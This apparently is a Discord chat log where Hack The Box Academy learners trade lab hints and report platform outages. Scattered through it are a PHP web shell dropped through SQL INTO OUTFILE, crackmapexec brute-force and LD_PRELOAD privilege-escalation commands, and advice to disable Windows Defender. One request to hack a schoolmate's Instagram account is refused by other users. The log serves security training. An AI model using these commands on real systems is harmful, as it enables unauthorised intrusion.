#modules

I think they are updating that module as some of the content is now out of date

Has anyone done Linux Priv Esc? I have a question about the skills assessment, flag4.

Hello

Hi

Can Someone help me with Broken Access Control ;skill assessment ? After trying for hours Im totally lost.

i need an advice regarding the Pivoting Skills. reached mlefay, found 172.16.6.35 with the Powershell Ping Sweep but how can i find the creds to login there? Opened a lot of hidden files but nothing 👀

how far have you got?

I found 1 user and I think I figure out the password pattern

anyone available for a hint for AD Enumeration & Attacks - Skills Assessment Part II question 5 - what is the user's password? i've enumerated the domain finding all the users but honestly lost on how to get the user credential from here on..thank you

dm me

Does anyone know who I can contact if I have a technical problem about a module ?

what type of problem?

most minor issues go to #858470491676737536

In the Windows Fundamental Module, when i use xfreerdp it keeps disconnect me from the remote Windows machine with error message

Has someone here done the "User interaction" part in the "Windows priv esc " module?

whats the error. Screen shot if you can

i have, what's the issue? also which section are on?

can i pm you?

sure

Almost done with Broken Access Skillassessment.. I need a little bit help

decoding the cookie

@lethal atlas +rep

thanks!!

This one

did you execute with sudo?

no is that the problem ? I executed it without sudo during the past sections and didnt disconnect like this

I found an alternative by using rdesktop

Could somebody help me with attacking common services smb "whats the password for jason"? I thought you just use crackmap and the provided password list to get the pw but theres no hit? ```sh
crackmapexec smb 10.129.194.196 -u jason -p ~/Desktop/pws.list

i use metasploit for that but crackmapexec would work just find a the cred for that user is in the given wordlist

oh nvm moved back a section to ftp and found it weired that you dont have to use SMB in the SMB section tho

oh yea that's is weired 🤣

nvm i just try crackmapexec flag the right cred as wrong on the pwnbox

worth trying the local auth or whatever its called for cme

Ive had a few fail cause cme trues the domain auth against a box thats not in a domain at all and so it just doesnt work but theres no error, you just either get all hits fail or more bizzarely all hits pass

i think i got a similar issue on an active directory lab a while back

@zealous belfry i just try with metasploit and it seem to be working fine for me use auxiliary/scanner/smb/smb_login

huh thats weired

let me try crackmapexec again on my machine hope this is not a pwnbox issue again

nah i dont use the pwnbox

oh

prob a CME issue

oh yeah i forgot you didn't cme

should try that

Nah if im honest that module is weird is af. It's SMB and you retrive the flag with brute-forcing ftp.. i dont get it

well the ftp is an alt route

its still achievable via smb

most of the section in this module is using the same target machine so if the jason user can login to smb mostly he can login via ftp and the flag is at the place you just can access it with multiple method

oh wait

--local-auth actually did the trick

@thorn urchin oh wow nice tip i'll note down thanks

Me too appreciate it ty

np

I probably stumbled across it while working on that very module

<@&861185840277487616>

Interesting

ty

SandPlanet has been banned permanently.

For the life of me I cant remember how to ssh to a target now that I have their private key

shh user@host -i key

make sure it has the correct chmod

that was it

thanks a ton, was brain farting

no worries 😄

over a months late but thanks for the respect on htb (i just learn how to check that 🤣 )

wait thats a thing lol

Yep, just gotta visit their profile

How do you open a encrypted docx file if you have the password?

open it

like in word

think open office/libre office is fine too

i'm not sure about docx but i can open password protected pdf on chrome

Thanks! that worked!

Rip this site spit out the pages as jpg so now I have to hand write the flag 😂

https://tenor.com/view/nobody-got-time-for-that-a-intnobody-got-time-for-that-no-time-for-that-nope-no-gif-10243842

Hello all, I am having issues with the last challenge with the HTTP headers section in http fundamentals. The question says to find the flag in the requests when browsing to the target in the network section of the devtools. I’m looking at the flag. Flag_….txt but no matter what format it says it’s wrong. I’ve tried restarting from scratch I’ve tried htb{} flag{} flag_ just the numbers.txt , the entire get request lol. Is this question broken?

HI

BEEP BEEP! BMW M4

Trying to dump the contents of an IMAP Mailbox over SSL, can someone point me in the right direction for the FETCH Cmd

@fresh reef what is the problem

Upon Login, after choosing my inbox, ive come against the current struggle pulling the message it self

1 FETCH 1:* FLAGS pulls the flag and the all pulls what a response i trly dont understand yet

as well as still cant find documentation on why the preceding "1" exist thus further clouding my debugging judgment

I'm having an imap command syntax struggle

@fresh reef maybe use evolution

0.0 evolution , looking of a binary cli-tool?

https://wiki.archlinux.org/title/GNOME/Evolution ?

@fresh reef I am not understanding u

@placid quest sent a terminal pic, and thx btw

Hello

Are people able to connect to Session Security: Skills Assessment, I can't connect to the minilab.htb.net even after vHost has been configured

Hi, I'm currently in the Passwords attack: pass the ticket part of academy and I've encountered a problem. I've used keytabextract.py to get a hash from a keytab file. It's only provided me with an aes-256 hash but I can't seem to crack it with hashcat or the online tool suggested by the module. Any suggestions?

this is the hash ||0c91040d4d05092a3d545bbf76237b3794c456ac42c8d577753d64283889da6d||

nevermind figured it out

no

Can someone nudge me forward in Session Security: Skills Assessment? How am I supposed to figure who the admin is, and what am I supposed to do with this:

hello i wan't anyperson in private

because i have a probleme

Well I haven't done it but as the error tells you, you are maybe missing the [?url=] parameter maybe it's a SSTI or sqli, idor something like this would be my first guess

This is the hint in the assignment, I just don't understand where can I get the '?url' part:

https://en.wikipedia.org/wiki/Query_string

Hi,

Is my understanding of LD PRELOAD correct?

If LD_PRELOAD is available and a user can run a SUID file, we can escalate privileges via loading a .so script, that is compiled C program via gcc.

Then overwrite the env with the shell and alongside with the SUID file to spawn a shell that will run as root.

sudo LD_PRELOAD=/tmp/shell.so sky_backup_utility

Thanks!

Hi guys, I need some help with attacking common applications skills assessment 2
What is the admin password to access this application? - I tried the default credentials and also a brute-force attack for the default admin user ||n...admin||, on the application from the question above, but I haven't got any valid password

Edit: solved!

hi can someone help me with the Pass the Hash (PtH) section of the password attacks module??

i can't figure out how to connect to DC01

any channel to discuss about retired machines or machines in general?

.so is Bash scripting ?

you mean the last question?

?????????????????????????

#710108839063846964 @dawn bloom maybe

i think u need to verify your account

Yes

write ++verify in #bot-commands

hello

until a moderator answers, i can't verufy my account

identification error for some reason

what have you managed to do so far for that question?

So u must wait then

I tried to use the reverse shell but I don’t know how to reach the dc 01 machine

hi

hola

Please see your DMs for instructions on how to verify your HTB account.

you mean you have a reverse shell?

or you can't get one?

dm me

I managed to create it with the site suggested by the module but I don’t know where to upload it

@rustic sage send us the command u are using to connect

Wait a sec and I’ll send you

you have to use it in the Invoke-WMIExec command

Yes i used that

and it didn't connect back?

nope

can i dm u?

ofc

Can you describe where you stuck at?

Question: can i change the letters to white, cuz grey on blue is not readable

nvm, for some reason firefox is redirecting my petitions to https, just tried other different than firefox and virtual ghosting isn't applying. Weird because i set the option 'HTTPS-only mode' disabled

idk if it's the version i'm using or because i'm launching firefox with firejail

up

What do you mean?

I rather have the text white

but its doable

As I remember, it stands for .soname it is similar to Windows DLL it is commonly used for pre loading a program the .soname also include the C runtime library.

is there anyone to help with PIVOTING AND TUNNELING SKILLS MODULE?how to transfer mimicatz to mlefay host?AM IN WITH xfreerdp /v:127.0.0.1:3300 /u:mlefay and can't find vfrank password,AM BADLY STUCK

Anyone else experiencing lag spawning targets?

yep

yes

Are targets down for everyone ?

These hosts are up apparently. But when you scan them individually nmap doesn't find any open ports

Ignore previous message. Those hosts are up and ports are open on them

mine spawned now

LD_PRELOAD allows you to specify the order stuff gets loaded. Such that you can load something before other stuff. If a SUID file exists and runs under elevated contexts, yes, you can escalate with it. However it's possible the program with LD_PRELOAD doesn't require a SUID file. I don't think one requires the other.

What do you mean?

same

the delay of any transfer of data with the Academy module targets.

For the AD skills assessment 2, question Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host - can someone give me a hand getting the flag? I've connected with the user/pass that I've found in the config file. Thank you

seeing everything operational though 🤨

yes

it's taking very long

Hi, I'm trying to spawn a machine but it keeps loading. Never happened before. Anyone know why it keeps loading?

Welcome to the club

look like I'm not alone xD

Looks like HTB is having some issues today. Be patient, I am sure they are working hard to fix the problem.

hi, I have an issue on academy. I click on spawn target (stack overflow linux x86 module), it says target is spawning but it doesn't spawn. I also tried to spawn targets in other modules but didn't work too. Can anyone help me?

never spawns

read everything abouve your coment.

oh sorry

I noticed now

Thanks a lot

I will try tomorrow

🤣 typically the day I decide to sit down and get some modules done...ah well

Me: of course...

same lol

depends if staff are aware of the problems 😕

Make sure to use the support bubble to report this as well.

Anyone?

would appreciate either

whats the default password for that service?

||PASSW0RD|| (with a zero), but it doesn't work

oh sorry, i misread my notes.. that didnt work for me either 😂

will DM

Cheers

F

not even trying to spawn now

connected!

Pwnbox is up for me now

For me the target of shells & payloads assessment is taking an eternity to spawn, I waited a whole hour for it to spawn and then refreshed the page to try again. When I tried again I was getting that same error. Now it's been loading again for about a good 20 minutes... 😕

i am also having issues spawning servers..........

If it helps to know, I'm seeing this as well. I cannot paste a picture in my post yet but it is stuck at "Target is spawning..." with spinning circle. Was working great a little over 7 hours ago when last using it. And generally, it works really really well, never have seen this before.

this.

FYI, I see this in the support chat window so they are very much aware of it: "We are currently investigating an issue with spawning machines on Academy. If you are affected, please do not open a ticket. We are working on resolving this as soon as possible."

could try and refresh and spawn again, did take mine a while though.. servers must be busy. maybe depends on VPN region/server as well.

Thanks... I usually do that, if not seeing a VM right away, refresh page and spawn... but after many times, no dice. Are you seeing it work for you?

yeh mine just started working 20 mins ago

👍

just in time for me to take a break 😄

LoL

I was thumb'ing up your mention of it working for you... but the emoji is so big I hope people do not think I'm saying it is working. 🙂

thanks for the HU.

np!

Can someone explain the question in broken authentication > session attacks > brute forcing cookies. I was able to convert one token to reveal the user and role. I can change them but Idk what Im supposed to change them too. The question asks for a super user which I tried as a role but no luck.

Just to check. Is anybody having issues spawning the target???

Is the issue still persisting???

Yup, still occurring for me.

I still have this issue yep

same

Hope support can get it fixed soon. We appreciate all that you do.

Right so there is an issue with spawning machines.. I thought something's wrong on my end 😅

Hey folks, guess what? I just came back to my system and had pwnbox and target IPs, things were up, so I figured things were back. Since I had been away, I had lost "time" on the systems, so immediately reset both to have a fresh long time period. After that, I see target spawning/spinning circles...

So maybe it works but is very very slow... so maybe just refresh, spawn, and wait and do not refresh... just wait, and you will eventually get a target. This would be consistent with what others have reported, that they eventually get one but it took a *long *while.

This is all a *guess *on my part, but I did have target and when I reset just now it went back to spinning/spawning and no target. I should not have reset for fresh long duration time period, just use whatever I had with whatever time was left.

Like right now mine is still "spawning" after 5 minutes ... but I am not refreshing at all, just not touching it, leaving it... I will report back if it eventually has IP.

I got a target after waiting for a few minutes, but the instance of gitlab isn't responding (502 code)

Okay, so maybe even though I saw IP, maybe the target was not fully functional. Thanks for the heads-up on that.

Does Gitlab have something to do with the box you were on, or is it to do with how the VM's work?

It's for the exercises on one of the modules, not part of all VMs

Seems to be fixed now. Everything works fine after ~15 minutes of uptime on the target

I still have spawning... about 7 to 10mins now.

oh just got IP after sending that last message.

I still have the issue :/
Pwnbox is working, just target is not

I'm having issues logging in to HTB Academy. Not receiving reset password email.

Issue resolved.

I had luck by refreshing, starting pwbbox, starting target, then waiting not refreshing for about 10 minutes and it eventually gave me a target.

I am using a target now and it has about 50 minutes left. It is the most productive I've been this morning... to refresh/spawn and wait. When I would keep refreshing, I never would get any target... so waiting after spawn, even for 10 minutes seems better than constantly spawning.

(that is what I observed, maybe you are seeing a different issue but sounds the same)

I was able to find this out by spawning and taking a coffee break... I came back and had an IP address. When I reset to spawn again, it was waiting for about 10 minutes before getting another IP. So I do not recommend resetting to get fresh "time" on the target, just wait for a target and use it as best you can until you need another.

hello for AD assessment 2, question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host - i am on the sql01 machine as administrator, ran mimikatz but did not get anything that might get me to ms01 machine, anyone could get me some help with this? thank you

Hi guys! Having some trouble with the Web Server Pivoting with Rpivot section.

Everything is working properly yet when i try to use proxychains to request the webserver it just keeps loading.

Running nmap against 172.16.5.135 via Proxychains work btw

Edit: Network was very slow, the request worked without doing anything, just had to wait

I'm on the Medium lab for Password Attacks || I know about the "d" user" But not sure how to crack his password, I tried the default passwords to tomcat but im not sure where to go from here ||

hello all how long should an smtp enum scan take? using quite a big txt file but seems to be taking a long time??

Hey I'm having problems to solve the "Attacking common services easy lab". I found ||fiona|| creds, the files into ||FTP|| and I was able to upload ||webshell php in mysql (SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php';) ||but when I go to the web page where I save it, it return "not found". Any hint please?

@hardy anchor did u login smtp

have you enumerated SMB already?

Can't it takes anonymous passwords so crackmap just returns everything as a valid password

I got really excited for all of 2 mins when it returned the password as 12345657

only to find out its a dead end

ya it allows anonymous access need to enumerate what you have access to

||You mean the doc? yeah thats how I got into J's account and thats where Im stuck lol ||

oh ok

I found || d account listed in the passwd file so I've been trying to figure out how to get to him to see if I can find more but i'm now stuck ||

ssh as J and try to access and enumerate MySQL service

You mean the sql db files?

always good to look at running services youll see the machine is running mysql database youll need to access the database and see what other information and creds you find on there

how do I see running services?

theres actually quite a few ways you can do so but I usually use the top command in linux it shows the prcoessses taking up the most memory and processing power

I see now

hmm

now I need to figure out how to open the db files

the terminal program you need to use is the same name as the service mysql

you could use other programs though too

people tend to reuse passwords

it seems so simple now

idk how I missed it

well, I do , I was thinking I needed to find the db file. I didnt even think to launch mysql 🤦‍♂️

Hey, I need help in PASSWORD ATTACKS - Attacking sam, I'm trying to dump the sam files with secretsdump but I have an error " 'NoNeType' object is not subscriptable" idk what Im doing wrong

I can't

@hardy anchor enumerate the smtp

Been there a bunch of times missing the seeming obvious

keep calm and enumerate

Yes I did it

anyone online that has done linux priv esc?

hello

someone can help me with Attacking Common Applications - Skills Assessment I

I was able to login but I can't do something interesting

I have

the Skills Assessment of that module have 3 unintended vuln and since i report that issue i haven't double check so it may be fixed also i staff said that entire module will be update soon

sure shoot me a dm if you still need help

gunna take a wild random guess than pwnkit was one of em

yep

my friend was doing the getting started module and was sidetracked trying to figure that out because linpeas pointed it out

I was like lol no I gurantee you thats an unintended path, look elsewhere

havnt done the module yet but tbh pwnkit is something important enough that it should probably be a part of that module somewhere

yep but it's just that the module is kinda old so an update would be good for newer exploit like this

yeah

its definitely the hard part about modules, you could get unlucky and as short as a month have the whole thing be outdated

so for that section i didn't extract the sam file and use secretsdump on that i use ||metasploit|| and ||crackmapexec||, i think both method are show in that section so use that

that module come out 2 years ago 🤣

yeah not shocked

Thx

Anyone who's completed the pentesting path? How long did it take you?

not many people have completed it yet so you may not get your answer, but for the record Im 50% of the way through and been at it for roughly a month

but your background is going to have a big influence on how quickly you get through

Having IT experience will be super helpful

it's been taking me a while since I have no college or career experience

However it is accessible for n00bies

i got 2 and a half module left but god know how long i been doing that path (most of that time is procrastinating 🤣 )

like I have a weird background in that I used to be super active like 10 years ago and then took a big break for a buncha years basically only tuning in to news n stuff but not really practicing or learning new stuff, so like the first 40% of the course was basically just a refresher for me.

the AD module is mammoth of one and been taking me the longest. Lots of content that's actually new to me plus a ton of sections, and wrist problems cropping up means taking notes has been difficult, so Ive slowed down a lot, probably been spending the past week and half on that module alone

Web stuff always used to be my weak area so im very curious and excited to see how those sections go for me

since at least if the hacktheboo ctf was anything to go off of, my intuition for that area has drastically changed since my old days.

Cbbh is great for web stuff

super in depth

have completed all the modules, will complete the exam sometime

yeah I may check it out after I finish the cpts, my post plans for it arent set in stone yet unless I miraculously save up enough for the OSCP, in which case thats definitely going to be my next aim after this.

its just so expensive that the few times ive had the money to purchase it Ive been too scared to bite the bullet even though rationally I know I have the capability to do just fine. So part of me is banking on clearing the much more accessible cpts to assuage the non rational emotional part of my brain into agreeing with the money risk.

since by all accounts the cpts is newer and harder than the oscp in most areas and the ones that it doesnt cover used to be my strong points anyways lol

I think oscp will be a breeze if you do cpts

thats what Im banking on

Wait Cpts is harder than oscp?

thats the general consensus so far yeah

its more modern and focuses more on TTPs

I mean oscp bans the usage of some tools because theyre too powerful and would make their exam lab too easy, cpts says use whatever youve got. Draw your own conclusions

what is TTPs?

tactics, techniques, and procedures

I dont know what that translates to in practical terms, its just what Ive read from people discussing them and staff, but my interpretation is that the OSCP is more likely to be a series of challenge boxes, wheras the CPTS is more likely to be a simulation of a real network and you must transverse it accordingly.

But I could be wrong.

hopefully within a couple of months I could answer more clearly 😉

Getting this error while executing chisel on Pivoting Tunneling and Port Forwarding module, in the SOCKS5 Tunneling with Chisel

./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)

Any idea how to fix?

anyone available for some help on this?

Could I have some help on attacking common applications: Gitlab?

I can't get the user enumeration bash script to work

looks like its breaking on something and causing syntax reading errors

try running it with sh specifically or bash specifically instead

so I changed my default shell to /bin/bash cuz I know pwnbox uses zsh

hello, can you help me I am in the COMMAND INJECTIONS module, exactly in Bypassing Blacklisted Commands and I don't know how to get and read flag.txt

dont need to change default shell you can just call the shell directly on the script

Still not working

you tried both bash and sh?

yes

well thats different error now

hey different errors are progress

not sure what that one means though, Id have to look at the script

@raven cairn use 49821.sh (with searchsploit)

Yeah, I'm using that script

Just renamed it

I get frustrated when I do exactly what the module tells me to do and it don't work 😭

oh yea you are using that script not the given script that's weird

let me give it a check

pls

Good to know! My plan was to go this route, then move towards OSCP as my next target.

https://academy.hackthebox.com/achievement/451392/147

What a beast!

took me two weeks!

I hated that module lol

too much time wasting stuff

so... it's working fine for me, try re-copy the script

searchsploit -m ruby/webapps/49821.sh
./49821.sh ```

good job though!

Got it to work. The script on exploitdb wasn't working for me for some reason

but that should be the same one on searchsploit?

yep it should be

oh wait so i think i miss remember that there are no given script i try with the one on exploitdb and that doesn't work but the one in searchsploit work for me

Yeah the module gives you a script from exploit db so I just used that one

oh

weird that they would be different

want to know something weirder? both script are the same both have 110 word and a text compare show both script are the same but the one on exploitdb don't work

probably encoding shenanigans then

hexdump with xxd and compare those 😛

@vital adder yup, the one on pwnbox is just ASCII, the downloaded one from exploitdb is ASCII with CRLF line terminators

oh yea why didn't i use file for both file

cat 49821.sh | tr -d '\r' | bash

works fine

or just tr -d '\r' 49821.sh > better.sh for that matter

yea the code are the same so if you just copy the raw code from exploitdb it should just work fine

that sounds like extra steps that tr can do for you

Hi Can someone help me with the last question (find another user with dsync rights) of enumerate domain acl section for the AD PowerView module?

hi can someone give me a hint for this part of the Windows fundamentals module?

I'm trying to identify the service that has to do with PDF editing

I don't want someone to just give me the answer but if I could have a hint

I figured out multiple ways of looking at different services on the windows machine

but I don't see one that has to do with PDFs specifically

ive not done this module so idk for it specifically, but in the real world how Id tell is browsing any websites theyve got and look for any pdf files they might be hosting, then checking the metadata for that.

I dunno if thats what theyre going for in the module though

I don't think so

there's no PDFs open

and I don't think there are any on the system

that are saved anyways

so its a tough one

solved it

never mind

can anyone help me with an SMTP issue please? 🙂

im struggling to change the query time! not quite sure what or where i need to put in my command to change it...

50% in two months or something am a rookie,a bit of everything

For the record, the reason it doesn't work is because the shebang line (#!/bin/bash) isn't usually put as the very first in most scripts from exploitdb. For errors like this make sure to always check the shebang line, and move/add it

Sure, dm me or write here what you've tried so far

no

Read the #rules we don't allow illegal activities. EDIT FOR FUTURE STAFF: There was an srs rule break ping, it's not a ghost ping

read the #rules before asking such questions @tired badge

Can anyone help me with this

Can any one help me with hashcat concept

@woven copper any hint on this one? Found this, if someone has some issue regarding this, DM me.

Attacking Enterprise Networks - Lateral Movement says We can do this via Proxychains using GetUserSPNs.py or PowerView but every single combo I try with GetUseSPNs.py returns the same error: [-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C090690, comment: AcceptSecurityContext error, data 52e, v4563. Tried it with 4 users, including the Administrator 🤔 The PowerView method works fine, any ideas??

Doing Passwords Mutation section in Password Attacks modules. Is it normal the exercise takes so long to bruteforce the correct password?

For the Web Service & API Attacks module, did anyone do it the SQL Injection way? I've done it using a different method and was wondering about the sql injection way

For those who come to face the error "version `GLIBC_2.32' not found" (or similar) on the SOCKS5 Tunneling with Chisel section.

You can do export CGO_ENABLED=0 to disable CGo and get rid of the dependencies, and then use go build and the binary will work.

nice

Hi how can i register in HTB ctf 2022

Do you mean hacktheboo? Because it's already over

I am not aware of any HTB CTF running right now.

Hey good morning! I'm having problems to solve the "Attacking common services easy lab". I found ||fiona|| creds, the files into ||FTP|| and I was able to upload ||webshell in mysql (SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php';)|| but when I go to the web page where I save it, it return "not found". Any hint please?

from your mutation list, delete the first 17000 passwords. I had the same issue and was told this here.

hi

Also on this module, when you escalate privs on Win01 the guide says to run mimikatz after adding your user (ilfserveradm) to the administrators group. I did that but mimikatz doesnt have enough privileges. Tried to launch a new cmd.exe as admin but it rejects the creds 😕 edit: I can't read the flag on Administrator desktop either, is some step missing from the section? same issue was mentioned on forum but no response - https://forum.hackthebox.com/t/attacking-enterprise-networks-lateral-movement/266130 - double edit: i just modified privesc to get a reverse shell instead

i did it already, but still doesnt have it.......

dm me

looking for help at the attacking common services - hard lab. I managed to get rdp session with F**** who doesn't really have much privs. ||The problem is I cannot do impersonation with msf cause it tells me none of the users that can be impersonated are sysadmins.||. I found out about the|| linked server|| but I'm unable to access it yet.

I’ve not done that one yet, but based on the error make sure you’re escaping any special characters in the password

Or specify DC if available

i did specify dc and the passwords are inside single quotes so no escaping needed.. also same error with the Administrator hash 😕

Another thing to check is whether the proxychains dns is interfering. Are you using IP address or host names?

By default host names through proxy chains goes to 4.4.2.2

using IP, have not had any issues using proxychains with impacket etc until now. i can use the same creds/hashes and IPs with other scripts, e.g. psexec.py, crackmapexec, evil-winrm

my notes for this aren't great but ||you should be able to impersonate, i did it manually via RDP i think (not MSF)||

Hi Farax. I need a little help with easy lab. Could you please give me a hint?

This is my message

Is there no one who can help me with smtp-user-enum??!!

try to write that same command 2 times and you will get an error that the file already exists but you will see then why you cannot access the web shell, there is something in the command that needs to be added so it goes in the directory specified. If you still won't know whats the catch PM me

did you rdp with user f**** ? because i cannot login anywhere with user j***...
And in mssql i can only login with user f**** by win auth

yep with f***, might of used CME to enable RDP (but doubt it as its not in my notes)

Hi,
I'm stuck on Attacking Active directory module, ACL section
Can someone help me please ? 🙂

Thank you Farax. I will try that

I think there are some issues with Password Attacks module... it is being a waste of time as things doesnt work as teached

@merry salmon Thank you!! I just spoted up

Can I have help in Attacking Active Directory & NTDS.dit section on Password Attacks module?

hi, I am new, and was wondering if I could start learning a bit of ethical hacking somewhere ?

Warning: xx.xx.xxx.xx giving up on port because retransmission cap hit (10).
does anyone know why this problem happens?

and how to solve

what module?

Scan slower

start with the getting started module on academy

oh ok thanks you kind sir/lady

Can anyone help a bit with one of the last tasks in intro to assembly module ?

Anyone completed ACTIVE DIRECTORY ENUMERATION & ATTACKS ? I am having an issue with uestion 2.

question 2 of what section

active directory enumeration and attacks

Question 2

I found the user and cracked the hash but it seems to be incorrect.

thats the name of the module,theres multiple sections within that module, which section are you on

Sorry. Miscellaneous Misconfigurations

footprinting

ACTIVE DIRECTORY ENUMERATION & ATTACKS :Miscellaneous Misconfigurations question # 2

not dont that section of the module yet so idk, good luck

<@&861185840277487616>

well he's gone

scary dude yo

also that one didn't need a ping, just a lost soul 😄

but thank you

felt like clear spam so ping seemed warranted, but ill keeo it in mind

for a random troll like that you can just dm a mod or two for clean up 🙂

or ping if you see one of us active

sounds good

anyone help me to change query timeout on SMTP-user-enum? i dont know where I need to place it in the command line

theres -t idk if thats what youre looking for though

ive tried -t 15 and --timeout-enum 15 which im sure they are both right but ive tried moving all around the query but it doesnt change anything? so not sure...

what problem are you even trying to solve? might be trying the apply the wrong solution

my only other option is to metasploit but i should be able to get what im looking for via smtp-user-enum so bit frustrated i cant figure it out

footprinting module in the academy

ah yeah that one

which mode are you trying to use 😉

VRFY

hah I just finished footprinting today

nice! its been fun so far

hint hint hint

yes sir

are you sure thats the mode that works with this target

not anymore im not

xD

i believe a nmap default script will tell you what the smtp server accepts

the module covers several different methods, if one doesnt work, try another

ok ill be back... thank you 🙂

just cause server accepts it doesnt mean its viable path

ye, I'm just saying the nmap default scripts helps you figure out what you need to put for smtp-user-enum

@slow hawk fact✅

hi i'm new

so ive changed the mode.. but i still dont know where or how to change the query timeout?

i dont know where in the command i need to type it?

why do you need to change it?

Remember that some SMTP servers have higher response times.

@rustic sage what tool is that

so -t is for that

but Ill tell you, wasnt necessary for that module

I had to use -t for that

im still drawing blanks... let me revist my query 1 sec

pwnbox or VM?

VM

how i can learn kali

if the second mode you tried didnt work, try a third one

no such thing, its just a linux distro prebuilt with a bunch of tools

try the Linux fundementals module first, then the getting started module

pwnbox

thatd make sense then cause youd have greater latency to the target

pwnbox def doesnt need -t for this one

@fair belfry try some books maybe

understandable

mad can i pm with my query?

are you using the right wordlist @rustic sage ?

the one from the resouce?

resource*

yeah

yeah got that one...

can i pm yourself guns?

sure

I dont mind either

@slow hawk cheers for the help :). @thorn urchin thanks for the help 🙂

all solved now.

yay

nice, was it the mode 😂

proxychain configuration I have finished but still doesn't work @slow hawk

was wait time i needed to use -w

I've never used proxychains lol

weird, dont even see that as an option

me neither until it was pointed out lmfao. anyways its all good just running scan now so

my result just came through cheers peoples

Is anyone willing to help me or teach me how to hack a ig acc. He is someone from my school idk who he is tho he is posting gossip or secrets from everybody and posting it public and making beauty school competitions please someone help me please dm thanks. I am sorry if this is the wrong channel in advance.

literally a crime and against the rules

Hi everyone! I'm doing the attacking common services - medium lab and I have a question: I'm trying to brute force ftp (because ||fiona|| creds from last server didn't work) and I would like to know if it's the correct way to solve the lab because this probably could take a long time

no

try enumerating deeper

Yes, i found this:

||PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
53/tcp open domain syn-ack
110/tcp open pop3 syn-ack
995/tcp open pop3s syn-ack
2121/tcp open ccproxy-ftp syn-ack
30021/tcp open unknown syn-ack||

||fiona|| creds didn't work either for pop3 and ssh so I started with ftp. But probably the correct way is dns?

nope, you should look a bit more closely at what services are running and check for common misconfigurations first

Its also worth keeping in mind that much of hacking is finding the overlooked spots. Just cause they've locked down one service correctly doesnt mean theyve locked down that exact same service elsewhere correctly

Hm. Thank you @thorn urchin I will look more closely

my notes on this lab have me being shocked at how quickly the lab is over, that med lab is 80% just thorough enumeration

That hint made my realize what I forgot. Thanks

Lab completed 👍🏼

nice

Anyone completed ACTIVE DIRECTORY ENUMERATION & ATTACKS ? Miscellaneous Misconfigurations I am having an issue with uestion 2.

hey guys, is there someone who wants to have a look on a simple sqlmap command?

I probably have the dumbest question ever to be asked here, but I am stuck at Password Attacks module, section Attacking SAM, first question: Where is the SAM database located in the Windows registry? (Format: **). I'm stuck for like an hour, someone please put me out of my misery...

Its uhh right in the module for you

..

I got it...

Nice 🙂

Usually when the format thingy had four "*" it meant that the answer is four characters long...

I am stucked in the sql-injection module. I found some json-data to test with sqlmap, but however I draft the command (using -r flag or --data flag), the output after a long long runtime tells me, the POST parameter JSON does not seem to be injectable. Am I missing something really obvious here...?

I havnt done that module yet, but sounds like the json parameters arent injectable with sqlmap. Have you manually verified that it is indeed the route?

yes, I did.
I guess in this case I do have to work with json, because the previous description of the module also dealt with json-injections

I got it 😄

hi everybody, i'm stuck in File Upload Attack module on Limited File Uploads , on question 1 : "The above exercise contains an upload functionality that should be secure against arbitrary file uploads. Try to exploit it using one of the attacks shown in this section to read "/flag.txt"" .... i've tryed all payload but the app don't display anything .... any help??

Hello, I am doing the windows fundamental module. Could someone guide me on how to get the machine's build number and Os after having access

In the module they talk about this command:

wmic os list brief

ls

Okay let me elaborate; I am using xfreerdp tool and immediately I manage to have access to the windows target I am stuck on what to do next, could someone guide me please? My aim is to get the Os info

Hey guys

Is it normal I'm locked from sending messages on most other threads?

I was wondering how I gain points with hackthebox. I did the first beginner module called meow.

modules refer to academy modules, not individual boxes

im working on that section now, Ill let you know once I get through it

can someone help me

hi everyone! I was curious if anyone knew if MSSQL saved windows users passwords. I kinda went under the hood of SQLMap, and in queries.xml, tried to see how it requests usernames/password hashes for sqlserver. None of the queries returned the name I logged in with! the only username that showed up that I recognized was sa

Hi, idk that so thx for info

Hi everyone.

I am a newb and can't figure out a couple of things. Anyone feel like helping?

nevermind just found a great article. apparently windows authentication doesnt store the password in SQL server

I have a question with Windows and OpenVPN. When I use any Windows machine (VM) with openVPN and download the academy-regular.ovpn file and use it to connect to the training environment, the VPN constantly disconnects and reconnects making for a very painful experience. I have tried with a VM on ProxMox as well as a local KVM on my Linux machine. Using Linux or any Linux VM I can connect without issues. Does anyone else experience this or have an idea on how to solve the issue? I appreciate any help!

What do you need help with?

In Linux Fundamentals Page 5 / System Information. I can't seem to figure out What is the path to the htb-student's mail and Which shell is specified for the htb-student user.

Almost certain it's bash but it says no. After digging through all of the directories I don't see any about mail. IDK

Feeling real dumb. LOL

enumerate the /var directory for the mail. For the student shell you got it, just find the directory its in and list that first /directory/bash for example. Don't feel dumb about learning things!

Thank you very much CrazyHorse! I'm out of workstation time for today but that gives me a direction to go in tomorrow when I get back on. I appreciate your help very much!

No problem!

I’m working on the skills assessment for SQL Injections Fundamentals and I am trying to write a file to the web root “var/www/html” through a union injection but I keep getting “Errcode: 13 Permissions denied”. I am the root used so I don’t why this is happening any hints or tips would be greatly appreciated!

Maybe you don't have write permissions to that directory explicitly. Try the ||/dashboard|| directory.

How are you doing the SQL injection? you should be able to write to that directory without a problem.

theres two users asreproastable and both with easy to crack passwords, youre probably trying to submit the wrong one.

With a union injection similar to the example one in a previous lesson

are you on the skills assessment then? I was thinking you were on the writing files section...

the hint Pedant gave you is where you should go. keep an eye on the URL of the web page...

Can someone please help me with ACTIVE DIRECTORY ENUMERATION & ATTACKS > ACL Enumeration's last question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word). I found two using bloodhound but neither of them are being accepted as answer.

Hi, I'm doing the passwords attack easy lab, I've tried bruteforcing ssh with hydra but it doesn't get me anywhere. Nmap shows there are very few services I can try to attack on the machine so I'm kind of puzzled. Am I correct in trying a bruteforce attack? Or am I missing something?

hey! me too. it detects it as a infected dll.

could you try again by adding the dll folder as exception in windows defender?

although disabling defender worked just fine for me

Settings > Windows Security Settings> Virus & threat protection > Manage settings > Deactivate Real-time protection

@slim plover I eventually found it. Took me a while an i had to go through it a few times but finally got it with powershell and following the lesson.

